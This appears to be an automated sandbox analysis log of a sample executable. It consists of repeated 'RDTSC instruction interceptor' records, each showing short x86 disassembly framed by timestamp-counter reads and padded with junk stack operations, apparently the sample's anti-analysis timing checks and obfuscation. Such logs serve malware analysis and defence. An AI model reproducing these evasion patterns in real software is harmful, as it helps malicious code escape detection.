Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170380A second address: 1703841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E3h 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C464C second address: 16C4656 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170AD10 second address: 170AD1E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170B31D second address: 170B321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170B321 second address: 170B32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FEEDCB1F6D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1709B63 second address: 1709B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1709B7B second address: 1709B80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1709B80 second address: 1709B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1709B8C second address: 1709BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEEDCB1F6E5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170FE11 second address: 170FE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170F426 second address: 170F443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007FEEDCB1F6D6h 0x0000000e jmp 00007FEEDCB1F6DDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170F443 second address: 170F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170F449 second address: 170F44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170FC68 second address: 170FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170FC6F second address: 170FC75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711097 second address: 17110B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2F2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17110B4 second address: 17110BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17110BE second address: 17110E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEDCB2F2E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17110E0 second address: 17110E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17110E6 second address: 17110EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17110EC second address: 171113E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jnp 00007FEEDCB1F6E6h 0x00000012 jmp 00007FEEDCB1F6E0h 0x00000017 pop eax 0x00000018 mov dword ptr [ebp+122DB60Fh], edi 0x0000001e call 00007FEEDCB1F6E6h 0x00000023 mov si, bx 0x00000026 pop edi 0x00000027 call 00007FEEDCB1F6D9h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171113E second address: 1711148 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711148 second address: 1711152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711152 second address: 171115F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171115F second address: 171116C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FEEDCB1F6D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171116C second address: 1711180 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711180 second address: 17111CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FEEDCB1F6E1h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FEEDCB1F6E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17111CC second address: 17111DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17117A7 second address: 17117AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17117AB second address: 17117B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17117B1 second address: 17117B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711C88 second address: 1711C8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711D41 second address: 1711D7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FEEDCB1F6D8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1C0Ah], ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jp 00007FEEDCB1F6D8h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711D7D second address: 1711D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711D83 second address: 1711D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711D87 second address: 1711D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711DDD second address: 1711DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711DE1 second address: 1711DFB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEEDCB2F2ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FEEDCB2F2E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711DFB second address: 1711DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711FD1 second address: 1711FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1711FE5 second address: 1711FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127B6 second address: 17127BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127BA second address: 17127BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127BE second address: 17127D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEEDCB2F2E8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127D4 second address: 17127D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127D8 second address: 17127F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17127F1 second address: 1712866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FEEDCB1F6D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1F45h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FEEDCB1F6D8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 jnp 00007FEEDCB1F6DCh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007FEEDCB1F6D8h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714207 second address: 171420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171420B second address: 1714224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEEDCB1F6D8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 jg 00007FEEDCB1F6E4h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714224 second address: 1714291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FEEDCB2F2E8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007FEEDCB2F2ECh 0x0000002b push 00000000h 0x0000002d mov edi, 24C10A80h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FEEDCB2F2E8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 jmp 00007FEEDCB2F2EBh 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CC6 second address: 1714CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CCA second address: 1714CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1714CD0 second address: 1714D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FEEDCB1F6E0h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jng 00007FEEDCB1F6D6h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEEDCB1F6D8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+1245A279h], edi 0x0000003b push 00000000h 0x0000003d add si, AB01h 0x00000042 push 00000000h 0x00000044 mov esi, edi 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jo 00007FEEDCB1F6D8h 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17157A3 second address: 17157D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov dword ptr [ebp+122D2009h], esi 0x00000011 mov edi, edx 0x00000013 popad 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D2250h], eax 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D3442h], edi 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FEEDCB2F2E8h 0x0000002d push edi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716176 second address: 1716181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEEDCB1F6D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716181 second address: 17161A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FEEDCB2F2F7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1716BC2 second address: 1716BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175BE second address: 17175C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175C4 second address: 17175CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17175CE second address: 1717606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1C4Eh], ebx 0x00000012 adc si, 22A2h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b add dword ptr [ebp+122D2CE6h], esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1717606 second address: 171760C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171B6F2 second address: 171B702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171698B second address: 1716994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DCBB second address: 171DCC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1720D52 second address: 1720D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723D48 second address: 1723DBD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB2F2ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FEEDCB2F2E8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2198h] 0x0000002d mov edi, dword ptr [ebp+122D2F57h] 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D1CDEh] 0x0000003b push 00000000h 0x0000003d jmp 00007FEEDCB2F2F4h 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FEEDCB2F2F1h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723DBD second address: 1723DC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1723DC7 second address: 1723DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1717F13 second address: 1717F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724CB0 second address: 1724CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1724CB6 second address: 1724CEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FEEDCB1F6D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D1F55h], ebx 0x00000013 push 00000000h 0x00000015 movsx edi, bx 0x00000018 push 00000000h 0x0000001a jnl 00007FEEDCB1F6DCh 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 push ebx 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 jnp 00007FEEDCB1F6DCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725AD5 second address: 1725ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1725ADA second address: 1725B33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEEDCB1F6D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FEEDCB1F6DCh 0x00000012 nop 0x00000013 jc 00007FEEDCB1F6DCh 0x00000019 and ebx, dword ptr [ebp+122D28B3h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FEEDCB1F6D8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b stc 0x0000003c push 00000000h 0x0000003e cmc 0x0000003f mov edi, dword ptr [ebp+122D1BF8h] 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DEBA second address: 171DEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171CE1A second address: 171CE1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171DEBF second address: 171DEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEEDCB2F2E6h 0x0000000a rdtsc
